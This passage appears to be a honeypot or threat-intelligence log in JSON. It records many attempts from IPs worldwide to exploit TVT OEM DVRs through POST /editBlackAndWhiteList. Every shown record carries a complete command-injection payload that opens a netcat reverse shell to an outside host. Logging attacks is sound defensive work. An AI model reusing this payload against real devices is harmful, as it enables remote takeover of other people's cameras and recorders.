- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 4,
- "first_seen": "2019-12-20T10:39:51Z",
- "last_seen": "2019-12-20T10:39:51Z"
- },
- {
- "source_ip_address": "95.123.27.193",
- "country": "ES",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-20T10:05:34Z",
- "last_seen": "2019-12-20T10:05:34Z"
- },
- {
- "source_ip_address": "59.127.129.111",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T10:00:07Z",
- "last_seen": "2019-12-20T10:00:07Z"
- },
- {
- "source_ip_address": "72.90.161.139",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T09:56:00Z",
- "last_seen": "2019-12-20T09:56:00Z"
- },
- {
- "source_ip_address": "98.119.140.65",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T09:53:06Z",
- "last_seen": "2019-12-20T09:53:06Z"
- },
- {
- "source_ip_address": "49.213.213.152",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T09:12:32Z",
- "last_seen": "2019-12-20T09:12:32Z"
- },
- {
- "source_ip_address": "189.180.91.12",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-20T08:45:32Z",
- "last_seen": "2019-12-20T08:45:32Z"
- },
- {
- "source_ip_address": "76.19.148.178",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 5,
- "first_seen": "2019-12-20T08:38:11Z",
- "last_seen": "2019-12-20T08:38:11Z"
- },
- {
- "source_ip_address": "203.106.200.190",
- "country": "MY",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T08:37:56Z",
- "last_seen": "2019-12-20T08:37:56Z"
- },
- {
- "source_ip_address": "5.2.143.125",
- "country": "RO",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-20T08:29:45Z",
- "last_seen": "2019-12-20T08:29:45Z"
- },
- {
- "source_ip_address": "50.78.118.82",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T08:13:19Z",
- "last_seen": "2019-12-20T08:13:19Z"
- },
- {
- "source_ip_address": "94.244.140.95",
- "country": "UA",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T08:11:24Z",
- "last_seen": "2019-12-20T08:11:24Z"
- },
- {
- "source_ip_address": "123.241.153.89",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 96,
- "first_seen": "2019-12-20T08:04:15Z",
- "last_seen": "2019-12-20T08:04:15Z"
- },
- {
- "source_ip_address": "171.25.198.21",
- "country": "PL",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-20T07:57:41Z",
- "last_seen": "2019-12-20T07:57:41Z"
- },
- {
- "source_ip_address": "24.89.231.103",
- "country": "CA",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T07:46:45Z",
- "last_seen": "2019-12-20T07:46:45Z"
- },
- {
- "source_ip_address": "47.34.238.92",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T07:37:43Z",
- "last_seen": "2019-12-20T07:37:43Z"
- },
- {
- "source_ip_address": "179.159.7.2",
- "country": "BR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 5,
- "first_seen": "2019-12-20T07:15:26Z",
- "last_seen": "2019-12-20T07:15:26Z"
- },
- {
- "source_ip_address": "67.204.200.237",
- "country": "CA",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T07:09:39Z",
- "last_seen": "2019-12-20T07:09:39Z"
- },
- {
- "source_ip_address": "202.160.16.143",
- "country": "BN",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-20T06:51:56Z",
- "last_seen": "2019-12-20T06:51:56Z"
- },
- {
- "source_ip_address": "212.162.128.152",
- "country": "GB",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T06:35:00Z",
- "last_seen": "2019-12-20T06:35:00Z"
- },
- {
- "source_ip_address": "216.198.171.130",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T06:33:02Z",
- "last_seen": "2019-12-20T06:33:02Z"
- },
- {
- "source_ip_address": "220.134.143.246",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T05:56:15Z",
- "last_seen": "2019-12-20T05:56:15Z"
- },
- {
- "source_ip_address": "103.224.200.9",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T05:55:58Z",
- "last_seen": "2019-12-20T05:55:58Z"
- },
- {
- "source_ip_address": "191.255.246.208",
- "country": "BR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T05:39:28Z",
- "last_seen": "2019-12-20T05:39:28Z"
- },
- {
- "source_ip_address": "81.104.29.108",
- "country": "GB",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T05:37:36Z",
- "last_seen": "2019-12-20T05:37:36Z"
- },
- {
- "source_ip_address": "189.190.16.210",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T05:36:59Z",
- "last_seen": "2019-12-20T05:36:59Z"
- },
- {
- "source_ip_address": "60.52.117.101",
- "country": "MY",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T05:16:34Z",
- "last_seen": "2019-12-20T05:16:34Z"
- },
- {
- "source_ip_address": "114.33.24.233",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
